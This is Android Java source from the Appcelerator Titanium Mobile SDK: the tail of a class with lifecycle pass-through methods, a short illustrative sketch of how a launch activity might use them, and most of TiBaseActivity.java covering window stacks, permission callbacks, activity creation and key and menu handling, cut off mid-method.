protected void activityOnPause() { super.onPause(); } protected void activityOnRestart() { super.onRestart(); } protected void activityOnResume() { super.onResume(); } protected void activityOnStop() { super.onStop(); } protected void activityOnStart() { super.onStart(); } protected void activityOnDestroy() { super.onDestroy(); } public void activityOnCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); } /** * Called by the onCreate methods of TiBaseActivity to determine if an unsupported application * re-launch appears to be occurring. * @param activity The Activity getting the onCreate * @param savedInstanceState The argument passed to the onCreate. A non-null value is a "tell" * that the system is re-starting a killed application. */ public static boolean isUnsupportedReLaunch(Activity activity, Bundle savedInstanceState) { // We have to relaunch the app if // 1. all the activities have been killed and the runtime has been disposed or // 2. the app's hosting process has been killed. In this case, onDestroy or any other method // is not called. We can check the status of the root activity to detect this situation. if (savedInstanceState != null && !(activity instanceof TiLaunchActivity) && (KrollRuntime.isDisposed() || TiApplication.getInstance().rootActivityLatch.getCount() != 0)) { return true; } return false; } }
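The comment block above describes how TiLaunchActivity works around Android bug 2373 by calling these activityOnXxxx pass-throughs instead of TiBaseActivity's own lifecycle handlers. As a rough illustration only (the subclass name and the restart flag are assumptions, not part of the SDK source), a launch-style activity could route its callbacks like this while a restart is pending:

// Sketch: shows the intent of the activityOnXxxx pass-throughs above. When a restart is
// pending, only the built-in android.app.Activity callbacks run (effectively
// "super.super.onXxxx"), and the Titanium-specific lifecycle work in TiBaseActivity is skipped.
import org.appcelerator.titanium.TiBaseActivity;

public class HypotheticalLaunchActivity extends TiBaseActivity
{
	private boolean restartPending; // assumed flag, set when the unsupported re-launch is detected

	@Override
	protected void onPause()
	{
		if (restartPending) {
			activityOnPause(); // bypasses TiBaseActivity.onPause, calls Activity.onPause directly
			return;
		}
		super.onPause();
	}

	@Override
	protected void onResume()
	{
		if (restartPending) {
			activityOnResume(); // same idea for resume
			return;
		}
		super.onResume();
	}
}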
android/titanium/src/java/org/appcelerator/titanium/TiBaseActivity.java
/** * Appcelerator Titanium Mobile * Copyright (c) 2009-2014 by Appcelerator, Inc. All Rights Reserved. * Licensed under the terms of the Apache Public License * Please see the LICENSE included with this distribution for details. */ package org.appcelerator.titanium; import java.lang.ref.WeakReference; import java.util.ArrayList; import java.util.Iterator; import java.util.List; import java.util.Stack; import java.util.concurrent.ConcurrentHashMap; import java.util.concurrent.CopyOnWriteArrayList; import org.appcelerator.kroll.KrollDict; import org.appcelerator.kroll.KrollFunction; import org.appcelerator.kroll.KrollObject; import org.appcelerator.kroll.KrollProxy; import org.appcelerator.kroll.KrollRuntime; import org.appcelerator.kroll.common.Log; import org.appcelerator.kroll.common.TiMessenger; import org.appcelerator.titanium.TiLifecycle.OnLifecycleEvent; import org.appcelerator.titanium.TiLifecycle.OnWindowFocusChangedEvent; import org.appcelerator.titanium.TiLifecycle.interceptOnBackPressedEvent; import org.appcelerator.titanium.TiLifecycle.OnActivityResultEvent; import org.appcelerator.titanium.TiLifecycle.OnInstanceStateEvent; import org.appcelerator.titanium.TiLifecycle.OnCreateOptionsMenuEvent; import org.appcelerator.titanium.TiLifecycle.OnPrepareOptionsMenuEvent; import org.appcelerator.titanium.proxy.ActionBarProxy; import org.appcelerator.titanium.proxy.ActivityProxy; import org.appcelerator.titanium.proxy.IntentProxy; import org.appcelerator.titanium.proxy.TiViewProxy; import org.appcelerator.titanium.proxy.TiWindowProxy; import org.appcelerator.titanium.util.TiActivityResultHandler; import org.appcelerator.titanium.util.TiActivitySupport; import org.appcelerator.titanium.util.TiActivitySupportHelper; import org.appcelerator.titanium.util.TiConvert; import org.appcelerator.titanium.util.TiMenuSupport; import org.appcelerator.titanium.util.TiPlatformHelper; import org.appcelerator.titanium.util.TiUIHelper; import org.appcelerator.titanium.util.TiWeakList; import org.appcelerator.titanium.view.TiCompositeLayout; import org.appcelerator.titanium.view.TiCompositeLayout.LayoutArrangement; import android.app.Activity; import android.support.v7.app.AppCompatActivity; import android.app.Dialog; import android.content.Intent; import android.content.IntentSender; import android.content.pm.ActivityInfo; import android.content.pm.PackageManager; import android.content.res.Configuration; import android.graphics.PixelFormat; import android.hardware.SensorManager; import android.os.Build; import android.os.Bundle; import android.os.Message; import android.os.Messenger; import android.os.RemoteException; import android.util.DisplayMetrics; import android.view.KeyEvent; import android.view.Menu; import android.view.MenuItem; import android.view.OrientationEventListener; import android.view.Surface; import android.view.View; import android.view.Window; import android.view.WindowManager; import android.view.ViewGroup.LayoutParams; import com.appcelerator.aps.APSAnalytics; /** * The base class for all non tab Titanium activities. To learn more about Activities, see the * <a href="http://developer.android.com/reference/android/app/Activity.html">Android Activity documentation</a>. 
*/ public abstract class TiBaseActivity extends AppCompatActivity implements TiActivitySupport/*, ITiWindowHandler*/ { private static final String TAG = "TiBaseActivity"; private static OrientationChangedListener orientationChangedListener = null; private OrientationEventListener orientationListener; private boolean onDestroyFired = false; private int originalOrientationMode = -1; private boolean inForeground = false; // Indicates whether this activity is in foreground or not. private TiWeakList<OnLifecycleEvent> lifecycleListeners = new TiWeakList<OnLifecycleEvent>(); private TiWeakList<OnWindowFocusChangedEvent> windowFocusChangedListeners = new TiWeakList<OnWindowFocusChangedEvent>(); private TiWeakList<interceptOnBackPressedEvent> interceptOnBackPressedListeners = new TiWeakList<interceptOnBackPressedEvent>(); private TiWeakList<OnInstanceStateEvent> instanceStateListeners = new TiWeakList<OnInstanceStateEvent>(); private TiWeakList<OnActivityResultEvent> onActivityResultListeners = new TiWeakList<OnActivityResultEvent>(); private TiWeakList<OnCreateOptionsMenuEvent> onCreateOptionsMenuListeners = new TiWeakList<OnCreateOptionsMenuEvent>(); private TiWeakList<OnPrepareOptionsMenuEvent> onPrepareOptionsMenuListeners = new TiWeakList<OnPrepareOptionsMenuEvent>(); private APSAnalytics analytics = APSAnalytics.getInstance(); public static class PermissionContextData { private final Integer requestCode; private final KrollObject context; private final KrollFunction callback; public PermissionContextData(Integer requestCode, KrollFunction callback, KrollObject context) { this.requestCode = requestCode; this.callback = callback; this.context = context; } public Integer getRequestCode() { return requestCode; } public KrollFunction getCallback() { return callback; } public KrollObject getContext() { return context; } } private static ConcurrentHashMap<Integer,PermissionContextData> callbackDataByPermission = new ConcurrentHashMap<Integer, PermissionContextData>(); protected View layout; protected TiActivitySupportHelper supportHelper; protected int supportHelperId = -1; protected TiWindowProxy window; protected TiViewProxy view; protected ActivityProxy activityProxy; protected TiWeakList<ConfigurationChangedListener> configChangedListeners = new TiWeakList<ConfigurationChangedListener>(); protected int orientationDegrees; protected TiMenuSupport menuHelper; protected Messenger messenger; protected int msgActivityCreatedId = -1; protected int msgId = -1; protected static int previousOrientation = -1; //Storing the activity's dialogs and their persistence private CopyOnWriteArrayList<DialogWrapper> dialogs = new CopyOnWriteArrayList<DialogWrapper>(); private Stack<TiWindowProxy> windowStack = new Stack<TiWindowProxy>(); public TiWindowProxy lwWindow; public boolean isResumed = false; private boolean overridenLayout; public class DialogWrapper { boolean isPersistent; Dialog dialog; WeakReference<TiBaseActivity> dialogActivity; public DialogWrapper(Dialog d, boolean persistent, WeakReference<TiBaseActivity> activity) { isPersistent = persistent; dialog = d; dialogActivity = activity; } public TiBaseActivity getActivity() { if (dialogActivity == null) { return null; } else { return dialogActivity.get(); } } public void setActivity(WeakReference<TiBaseActivity> da) { dialogActivity = da; } public Dialog getDialog() { return dialog; } public void setDialog(Dialog d) { dialog = d; } public void release() { dialog = null; dialogActivity = null; } public boolean getPersistent() { return isPersistent; } 
public void setPersistent(boolean p) { isPersistent = p; } } public void addWindowToStack(TiWindowProxy proxy) { if (windowStack.contains(proxy)) { Log.e(TAG, "Window already exists in stack", Log.DEBUG_MODE); return; } boolean isEmpty = windowStack.empty(); if (!isEmpty) { windowStack.peek().onWindowFocusChange(false); } windowStack.add(proxy); if (!isEmpty) { proxy.onWindowFocusChange(true); } } public void removeWindowFromStack(TiWindowProxy proxy) { proxy.onWindowFocusChange(false); boolean isTopWindow = ( (!windowStack.isEmpty()) && (windowStack.peek() == proxy) ) ? true : false; windowStack.remove(proxy); //Fire focus only if activity is not paused and the removed window was topWindow if (!windowStack.empty() && isResumed && isTopWindow) { TiWindowProxy nextWindow = windowStack.peek(); nextWindow.onWindowFocusChange(true); } } /** * Returns the window at the top of the stack. * @return the top window or null if the stack is empty. */ public TiWindowProxy topWindowOnStack() { return (windowStack.isEmpty()) ? null : windowStack.peek(); } // could use a normal ConfigurationChangedListener but since only orientation changes are // forwarded, create a separate interface in order to limit scope and maintain clarity public static interface OrientationChangedListener { public void onOrientationChanged (int configOrientationMode, int width, int height); } public static void registerOrientationListener (OrientationChangedListener listener) { orientationChangedListener = listener; } public static void deregisterOrientationListener() { orientationChangedListener = null; } public static interface ConfigurationChangedListener { public void onConfigurationChanged(TiBaseActivity activity, Configuration newConfig); } /** * @return the instance of TiApplication. */ public TiApplication getTiApp() { return (TiApplication) getApplication(); } /** * @return the window proxy associated with this activity. */ public TiWindowProxy getWindowProxy() { return this.window; } /** * Sets the window proxy. * @param proxy */ public void setWindowProxy(TiWindowProxy proxy) { this.window = proxy; } /** * Sets the proxy for our layout (used for post layout event) * * @param proxy */ public void setLayoutProxy(TiViewProxy proxy) { if (layout instanceof TiCompositeLayout) { ((TiCompositeLayout) layout).setProxy(proxy); } } /** * Sets the view proxy. * @param proxy */ public void setViewProxy(TiViewProxy proxy) { this.view = proxy; } /** * @return activity proxy associated with this activity. */ public ActivityProxy getActivityProxy() { return activityProxy; } public void addDialog(DialogWrapper d) { if (!dialogs.contains(d)) { dialogs.add(d); } } public void removeDialog(Dialog d) { for (int i = 0; i < dialogs.size(); i++) { DialogWrapper p = dialogs.get(i); if (p.getDialog().equals(d)) { p.release(); dialogs.remove(i); return; } } } public void setActivityProxy(ActivityProxy proxy) { this.activityProxy = proxy; } /** * @return the activity's current layout. 
*/ public View getLayout() { return layout; } public void setLayout(View layout) { this.layout = layout; } public void addConfigurationChangedListener(ConfigurationChangedListener listener) { configChangedListeners.add(new WeakReference<ConfigurationChangedListener>(listener)); } public void removeConfigurationChangedListener(ConfigurationChangedListener listener) { configChangedListeners.remove(listener); } public void registerOrientationChangedListener (OrientationChangedListener listener) { orientationChangedListener = listener; } public void deregisterOrientationChangedListener() { orientationChangedListener = null; } protected boolean getIntentBoolean(String property, boolean defaultValue) { Intent intent = getIntent(); if (intent != null) { if (intent.hasExtra(property)) { return intent.getBooleanExtra(property, defaultValue); } } return defaultValue; } protected int getIntentInt(String property, int defaultValue) { Intent intent = getIntent(); if (intent != null) { if (intent.hasExtra(property)) { return intent.getIntExtra(property, defaultValue); } } return defaultValue; } protected String getIntentString(String property, String defaultValue) { Intent intent = getIntent(); if (intent != null) { if (intent.hasExtra(property)) { return intent.getStringExtra(property); } } return defaultValue; } protected void updateTitle() { if (window == null) return; if (window.hasProperty(TiC.PROPERTY_TITLE)) { String oldTitle = (String) getTitle(); String newTitle = TiConvert.toString(window.getProperty(TiC.PROPERTY_TITLE)); if (oldTitle == null) { oldTitle = ""; } if (newTitle == null) { newTitle = ""; } if (!newTitle.equals(oldTitle)) { final String fnewTitle = newTitle; runOnUiThread(new Runnable(){ public void run() { setTitle(fnewTitle); } }); } } } // Subclasses can override to provide a custom layout protected View createLayout() { LayoutArrangement arrangement = LayoutArrangement.DEFAULT; String layoutFromIntent = getIntentString(TiC.INTENT_PROPERTY_LAYOUT, ""); if (layoutFromIntent.equals(TiC.LAYOUT_HORIZONTAL)) { arrangement = LayoutArrangement.HORIZONTAL; } else if (layoutFromIntent.equals(TiC.LAYOUT_VERTICAL)) { arrangement = LayoutArrangement.VERTICAL; } // set to null for now, this will get set correctly in setWindowProxy() return new TiCompositeLayout(this, arrangement, null); } @Override public void onRequestPermissionsResult(int requestCode, String permissions[], int[] grantResults) { if (!callbackDataByPermission.isEmpty()) { handlePermissionRequestResult(requestCode, permissions, grantResults); } } private void handlePermissionRequestResult(Integer requestCode, String[] permissions, int[] grantResults) { PermissionContextData cbd = callbackDataByPermission.get(requestCode); if (cbd == null) { return; } String deniedPermissions = ""; for (int i = 0; i < grantResults.length; ++i) { if (grantResults[i] == PackageManager.PERMISSION_DENIED) { if (deniedPermissions.isEmpty()) { deniedPermissions = permissions[i]; } else { deniedPermissions = deniedPermissions + ", " + permissions[i]; } } } KrollDict response = new KrollDict(); if (deniedPermissions.isEmpty()) { response.putCodeAndMessage(0, null); } else { response.putCodeAndMessage(-1, "Permission(s) denied: " + deniedPermissions); } KrollFunction callback = cbd.getCallback(); if (callback != null) { KrollObject context = cbd.getContext(); if (context == null) { Log.w(TAG, "Permission callback context object is null"); } callback.callAsync(context, response); } else { Log.w(TAG, "Permission callback function has not been set"); } } 
/** * register permission request result callback for activity * * @param requestCode request code (8 Bit) to associate callback with request * @param callback callback function which receives a KrollDict with success, * code, optional message and requestCode * @param context KrollObject as required by async callback pattern */ public static void registerPermissionRequestCallback(Integer requestCode, KrollFunction callback, KrollObject context) { if (callback != null && context != null) { callbackDataByPermission.put(requestCode, new PermissionContextData(requestCode, callback, context)); } } protected void setFullscreen(boolean fullscreen) { if (fullscreen) { //getWindow().addFlags(WindowManager.LayoutParams.FLAG_FULLSCREEN); View decorView = getWindow().getDecorView(); // Hide both the navigation bar and the status bar. // SYSTEM_UI_FLAG_FULLSCREEN is only available on Android 4.1 and higher, but as // a general rule, you should design your app to hide the status bar whenever you // hide the navigation bar. int uiOptions = View.SYSTEM_UI_FLAG_HIDE_NAVIGATION | View.SYSTEM_UI_FLAG_FULLSCREEN; decorView.setSystemUiVisibility(uiOptions); } } // Subclasses can override to handle post-creation (but pre-message fire) logic @SuppressWarnings("deprecation") protected void windowCreated(Bundle savedInstanceState) { boolean fullscreen = getIntentBoolean(TiC.PROPERTY_FULLSCREEN, false); boolean modal = getIntentBoolean(TiC.PROPERTY_MODAL, false); int softInputMode = getIntentInt(TiC.PROPERTY_WINDOW_SOFT_INPUT_MODE, -1); int windowFlags = getIntentInt(TiC.PROPERTY_WINDOW_FLAGS, 0); boolean hasSoftInputMode = softInputMode != -1; setFullscreen(fullscreen); if (windowFlags > 0) { getWindow().addFlags(windowFlags); } if (modal) { if (Build.VERSION.SDK_INT < TiC.API_LEVEL_ICE_CREAM_SANDWICH) { // This flag is deprecated in API 14. On ICS, the background is not blurred but straight black. getWindow().addFlags(WindowManager.LayoutParams.FLAG_BLUR_BEHIND); } } if (hasSoftInputMode) { Log.d(TAG, "windowSoftInputMode: " + softInputMode, Log.DEBUG_MODE); getWindow().setSoftInputMode(softInputMode); } boolean useActivityWindow = getIntentBoolean(TiC.INTENT_PROPERTY_USE_ACTIVITY_WINDOW, false); if (useActivityWindow) { int windowId = getIntentInt(TiC.INTENT_PROPERTY_WINDOW_ID, -1); TiActivityWindows.windowCreated(this, windowId, savedInstanceState); } } // Record if user has set a content view manually from hyperloop code during require of app.js! @Override public void setContentView(View view) { overridenLayout = true; super.setContentView(view); } @Override public void setContentView(int layoutResID) { overridenLayout = true; super.setContentView(layoutResID); } @Override public void setContentView(View view, LayoutParams params) { overridenLayout = true; super.setContentView(view, params); } @Override /** * When the activity is created, this method adds it to the activity stack and * fires a javascript 'create' event. * @param savedInstanceState Bundle of saved data. */ protected void onCreate(Bundle savedInstanceState) { Log.d(TAG, "Activity " + this + " onCreate", Log.DEBUG_MODE); inForeground = true; TiApplication tiApp = getTiApp(); if (tiApp.isRestartPending()) { super.onCreate(savedInstanceState); if (!isFinishing()) { finish(); } return; } // If all the activities has been killed and the runtime has been disposed or the app's hosting process has // been killed, we cannot recover one specific activity because the info of the top-most view proxy has been // lost (TiActivityWindows.dispose()). 
In this case, we have to restart the app. if (TiBaseActivity.isUnsupportedReLaunch(this, savedInstanceState)) { Log.w(TAG, "Runtime has been disposed or app has been killed. Finishing."); super.onCreate(savedInstanceState); tiApp.scheduleRestart(250); finish(); return; } TiApplication.addToActivityStack(this); // create the activity proxy here so that it is accessible from the activity in all cases activityProxy = new ActivityProxy(this); // Increment the reference count so we correctly clean up when all of our activities have been destroyed KrollRuntime.incrementActivityRefCount(); Intent intent = getIntent(); if (intent != null) { if (intent.hasExtra(TiC.INTENT_PROPERTY_MESSENGER)) { messenger = (Messenger) intent.getParcelableExtra(TiC.INTENT_PROPERTY_MESSENGER); msgActivityCreatedId = intent.getIntExtra(TiC.INTENT_PROPERTY_MSG_ACTIVITY_CREATED_ID, -1); msgId = intent.getIntExtra(TiC.INTENT_PROPERTY_MSG_ID, -1); } if (intent.hasExtra(TiC.PROPERTY_WINDOW_PIXEL_FORMAT)) { getWindow().setFormat(intent.getIntExtra(TiC.PROPERTY_WINDOW_PIXEL_FORMAT, PixelFormat.UNKNOWN)); } } // Doing this on every create in case the activity is externally created. TiPlatformHelper.getInstance().intializeDisplayMetrics(this); if (layout == null) { layout = createLayout(); } if (intent != null && intent.hasExtra(TiC.PROPERTY_KEEP_SCREEN_ON)) { layout.setKeepScreenOn(intent.getBooleanExtra(TiC.PROPERTY_KEEP_SCREEN_ON, layout.getKeepScreenOn())); } // Set the theme of the activity before calling super.onCreate(). // On 2.3 devices, it does not work if the theme is set after super.onCreate. int theme = getIntentInt(TiC.PROPERTY_THEME, -1); if (theme != -1) { this.setTheme(theme); } // Set ActionBar into split mode must be done before the decor view has been created // we need to do this before calling super.onCreate() if (intent != null && intent.hasExtra(TiC.PROPERTY_SPLIT_ACTIONBAR)) { getWindow().setUiOptions(ActivityInfo.UIOPTION_SPLIT_ACTION_BAR_WHEN_NARROW); } // we only want to set the current activity for good in the resume state but we need it right now. // save off the existing current activity, set ourselves to be the new current activity temporarily // so we don't run into problems when we give the proxy the event Activity tempCurrentActivity = tiApp.getCurrentActivity(); tiApp.setCurrentActivity(this, this); // we need to set window features before calling onCreate this.requestWindowFeature(Window.FEATURE_PROGRESS); this.requestWindowFeature(Window.FEATURE_INDETERMINATE_PROGRESS); if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP) { this.requestWindowFeature(Window.FEATURE_ACTIVITY_TRANSITIONS); } super.onCreate(savedInstanceState); windowCreated(savedInstanceState); if (activityProxy != null) { dispatchCallback(TiC.PROPERTY_ON_CREATE, null); activityProxy.fireEvent(TiC.EVENT_CREATE, null); } // set the current activity back to what it was originally tiApp.setCurrentActivity(this, tempCurrentActivity); // If user changed the layout during app.js load, keep that if (!overridenLayout) { setContentView(layout); } // Set the title of the activity after setContentView. // On 2.3 devices, if the title is set before setContentView, the app will crash when a NoTitleBar theme is used. 
updateTitle(); sendMessage(msgActivityCreatedId); // for backwards compatibility sendMessage(msgId); // store off the original orientation for the activity set in the AndroidManifest.xml // for later use originalOrientationMode = getRequestedOrientation(); orientationListener = new OrientationEventListener(this, SensorManager.SENSOR_DELAY_NORMAL) { @Override public void onOrientationChanged(int orientation) { DisplayMetrics dm = new DisplayMetrics(); getWindowManager().getDefaultDisplay().getMetrics(dm); int width = dm.widthPixels; int height = dm.heightPixels; int rotation = getWindowManager().getDefaultDisplay().getRotation(); if ((rotation == Surface.ROTATION_90 || rotation == Surface.ROTATION_270) && rotation != previousOrientation) { callOrientationChangedListener(TiApplication.getAppRootOrCurrentActivity(), width, height, rotation); } else if ((rotation == Surface.ROTATION_0 || rotation == Surface.ROTATION_180) && rotation != previousOrientation) { callOrientationChangedListener(TiApplication.getAppRootOrCurrentActivity(), width, height, rotation); } } }; if (orientationListener.canDetectOrientation() == true) { orientationListener.enable(); } else { Log.w(TAG, "Cannot detect orientation"); orientationListener.disable(); } if (window != null) { window.onWindowActivityCreated(); } synchronized (lifecycleListeners.synchronizedList()) { for (OnLifecycleEvent listener : lifecycleListeners.nonNull()) { try { TiLifecycle.fireLifecycleEvent(this, listener, savedInstanceState, TiLifecycle.LIFECYCLE_ON_CREATE); } catch (Throwable t) { Log.e(TAG, "Error dispatching lifecycle event: " + t.getMessage(), t); } } } } public int getOriginalOrientationMode() { return originalOrientationMode; } public boolean isInForeground() { return inForeground; } protected void sendMessage(final int msgId) { if (messenger == null || msgId == -1) { return; } // fire an async message on this thread's queue // so we don't block onCreate() from returning TiMessenger.postOnMain(new Runnable() { public void run() { handleSendMessage(msgId); } }); } protected void handleSendMessage(int messageId) { try { Message message = TiMessenger.getMainMessenger().getHandler().obtainMessage(messageId, this); messenger.send(message); } catch (RemoteException e) { Log.e(TAG, "Unable to message creator. finishing.", e); finish(); } catch (RuntimeException e) { Log.e(TAG, "Unable to message creator. finishing.", e); finish(); } } protected TiActivitySupportHelper getSupportHelper() { if (supportHelper == null) { this.supportHelper = new TiActivitySupportHelper(this); // Register the supportHelper so we can get it back when the activity is recovered from force-quitting. supportHelperId = TiActivitySupportHelpers.addSupportHelper(supportHelper); } return supportHelper; } // Activity Support public int getUniqueResultCode() { return getSupportHelper().getUniqueResultCode(); } /** * See TiActivitySupport.launchActivityForResult for more details. */ public void launchActivityForResult(Intent intent, int code, TiActivityResultHandler resultHandler) { getSupportHelper().launchActivityForResult(intent, code, resultHandler); } /** * See TiActivitySupport.launchIntentSenderForResult for more details. 
*/ public void launchIntentSenderForResult(IntentSender intent, int requestCode, Intent fillInIntent, int flagsMask, int flagsValues, int extraFlags, Bundle options, TiActivityResultHandler resultHandler) { getSupportHelper().launchIntentSenderForResult(intent, requestCode, fillInIntent, flagsMask, flagsValues, extraFlags, options, resultHandler); } @Override protected void onActivityResult(int requestCode, int resultCode, Intent data) { super.onActivityResult(requestCode, resultCode, data); synchronized (onActivityResultListeners.synchronizedList()) { for (OnActivityResultEvent listener : onActivityResultListeners.nonNull()) { try { TiLifecycle.fireOnActivityResultEvent(this, listener, requestCode, resultCode, data); } catch (Throwable t) { Log.e(TAG, "Error dispatching onActivityResult event: " + t.getMessage(), t); } } } getSupportHelper().onActivityResult(requestCode, resultCode, data); } @Override public void onBackPressed() { synchronized (interceptOnBackPressedListeners.synchronizedList()) { for (interceptOnBackPressedEvent listener : interceptOnBackPressedListeners.nonNull()) { try { if (listener.interceptOnBackPressed()) { return; } } catch (Throwable t) { Log.e(TAG, "Error dispatching interceptOnBackPressed event: " + t.getMessage(), t); } } } TiWindowProxy topWindow = topWindowOnStack(); if (topWindow != null && topWindow.hasListeners(TiC.EVENT_ANDROID_BACK)) { topWindow.fireEvent(TiC.EVENT_ANDROID_BACK, null); } // Override default Android behavior for "back" press // if the top window has a callback to handle the event. if (topWindow != null && topWindow.hasProperty(TiC.PROPERTY_ON_BACK)) { KrollFunction onBackCallback = (KrollFunction) topWindow.getProperty(TiC.PROPERTY_ON_BACK); onBackCallback.callAsync(activityProxy.getKrollObject(), new Object[] {}); } else { // there are no parent activities to return to // override back press to background the activity // note: 2 since there should always be TiLaunchActivity and TiActivity if (TiApplication.activityStack.size() <= 2) { if (topWindow != null && !TiConvert.toBoolean(topWindow.getProperty(TiC.PROPERTY_EXIT_ON_CLOSE), true)) { this.moveTaskToBack(true); return; } } // If event is not handled by custom callback allow default behavior. 
super.onBackPressed(); } } @Override public boolean dispatchKeyEvent(KeyEvent event) { boolean handled = false; TiViewProxy window; if (this.window != null) { window = this.window; } else { window = this.view; } if (window == null) { return super.dispatchKeyEvent(event); } switch(event.getKeyCode()) { case KeyEvent.KEYCODE_BACK : { if (event.getAction() == KeyEvent.ACTION_UP) { String backEvent = "android:back"; KrollProxy proxy = null; //android:back could be fired from a tabGroup window (activityProxy) //or hw window (window).This event is added specifically to the activity //proxy of a tab group in window.js if (activityProxy.hasListeners(backEvent)) { proxy = activityProxy; } else if (window.hasListeners(backEvent)) { proxy = window; } if (proxy != null) { proxy.fireEvent(backEvent, null); handled = true; } } break; } case KeyEvent.KEYCODE_CAMERA : { if (window.hasListeners(TiC.EVENT_ANDROID_CAMERA)) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent(TiC.EVENT_ANDROID_CAMERA, null); } handled = true; } // TODO: Deprecate old event if (window.hasListeners("android:camera")) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent("android:camera", null); } handled = true; } break; } case KeyEvent.KEYCODE_FOCUS : { if (window.hasListeners(TiC.EVENT_ANDROID_FOCUS)) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent(TiC.EVENT_ANDROID_FOCUS, null); } handled = true; } // TODO: Deprecate old event if (window.hasListeners("android:focus")) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent("android:focus", null); } handled = true; } break; } case KeyEvent.KEYCODE_SEARCH : { if (window.hasListeners(TiC.EVENT_ANDROID_SEARCH)) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent(TiC.EVENT_ANDROID_SEARCH, null); } handled = true; } // TODO: Deprecate old event if (window.hasListeners("android:search")) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent("android:search", null); } handled = true; } break; } case KeyEvent.KEYCODE_VOLUME_UP : { if (window.hasListeners(TiC.EVENT_ANDROID_VOLUP)) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent(TiC.EVENT_ANDROID_VOLUP, null); } handled = true; } // TODO: Deprecate old event if (window.hasListeners("android:volup")) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent("android:volup", null); } handled = true; } break; } case KeyEvent.KEYCODE_VOLUME_DOWN : { if (window.hasListeners(TiC.EVENT_ANDROID_VOLDOWN)) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent(TiC.EVENT_ANDROID_VOLDOWN, null); } handled = true; } // TODO: Deprecate old event if (window.hasListeners("android:voldown")) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent("android:voldown", null); } handled = true; } break; } } if (!handled) { handled = super.dispatchKeyEvent(event); } return handled; } @Override public boolean onCreateOptionsMenu(Menu menu) { // If targetSdkVersion is set to 11+, Android will invoke this function // to initialize the menu (since it's part of the action bar). Due // to the fix for Android bug 2373, activityProxy won't be initialized b/c the // activity is expected to restart, so we will ignore it. 
if (activityProxy == null) { return false; } boolean listenerExists = false; synchronized (onCreateOptionsMenuListeners.synchronizedList()) { for (OnCreateOptionsMenuEvent listener : onCreateOptionsMenuListeners.nonNull()) { try { listenerExists = true; TiLifecycle.fireOnCreateOptionsMenuEvent(this, listener, menu); } catch (Throwable t) { Log.e(TAG, "Error dispatching OnCreateOptionsMenuEvent: " + t.getMessage(), t); } } } if (menuHelper == null) { menuHelper = new TiMenuSupport(activityProxy); } return menuHelper.onCreateOptionsMenu(super.onCreateOptionsMenu(menu) || listenerExists, menu); } @Override public boolean onOptionsItemSelected(MenuItem item) { switch (item.getItemId()) { case android.R.id.home: if (activityProxy != null) { ActionBarProxy actionBarProxy = activityProxy.getActionBar(); if (actionBarProxy != null) { KrollFunction onHomeIconItemSelected = (KrollFunction) actionBarProxy .getProperty(TiC.PROPERTY_ON_HOME_ICON_ITEM_SELECTED); KrollDict event = new KrollDict(); event.put(TiC.EVENT_PROPERTY_SOURCE, actionBarProxy); if (onHomeIconItemSelected != null) { onHomeIconItemSelected.call(activityProxy.getKrollObject(), new Object[] { event }); } } } return true; default: return menuHelper.onOptionsItemSelected(item); } } @Override public boolean onPrepareOptionsMenu(Menu menu) { boolean listenerExists = false; synchronized (onPrepareOptionsMenuListeners.synchronizedList()) { for (OnPrepareOptionsMenuEvent listener : onPrepareOptionsMenuListeners.nonNull()) { try { listenerExists = true; TiLifecycle.fireOnPrepareOptionsMenuEvent(this, listener, menu); } catch (Throwable t) { Log.e(TAG, "Error dispatching OnPrepareOptionsMenuEvent: " + t.getMessage(), t); } } } return menuHelper.onPrepareOptionsMenu(super.onPrepareOptionsMenu(menu) || listenerExists, menu); } public static void callOrientationChangedListener(Activity activity, int width, int height, int rotation) { if (activity != null) { int currentOrientation = activity.getWindowManager().getDefaultDisplay().getRotation(); if (orientationChangedListener != null && previousOrientation != currentOrientation) { previousOrientation = currentOrientation; orientationChangedListener.onOrientationChanged (currentOrientation, width, height); } } } @Override public void onConfigurationChanged(Configuration newConfig) { super.onConfigurationChanged(newConfig); for (WeakReference<ConfigurationChangedListener> listener : configChangedListeners) { if (listener.get() != null) { listener.get().onConfigurationChanged(this, newConfig); } } } @Override protected void onNewIntent(Intent intent) { super.onNewIntent(intent); Log.d(TAG, "Activity " + this + " onNewIntent", Log.DEBUG_MODE); if (activityProxy != null) { IntentProxy ip = new IntentProxy(intent); KrollDict data = new KrollDict(); data.put(TiC.PROPERTY_INTENT, ip); activityProxy.fireSyncEvent(TiC.EVENT_NEW_INTENT, data); // TODO: Deprecate old event activityProxy.fireSyncEvent("newIntent", data); } } public void addOnLifecycleEventListener(OnLifecycleEvent listener) { lifecycleListeners.add(new WeakReference<OnLifecycleEvent>(listener)); } public void addOnInstanceStateEventListener(OnInstanceStateEvent listener) { instanceStateListeners.add(new WeakReference<OnInstanceStateEvent>(listener)); } public void addOnWindowFocusChangedEventListener(OnWindowFocusChangedEvent listener) { windowFocusChangedListeners.add(new WeakReference<OnWindowFocusChangedEvent>(listener)); } public void addInterceptOnBackPressedEventListener(interceptOnBackPressedEvent listener) { 
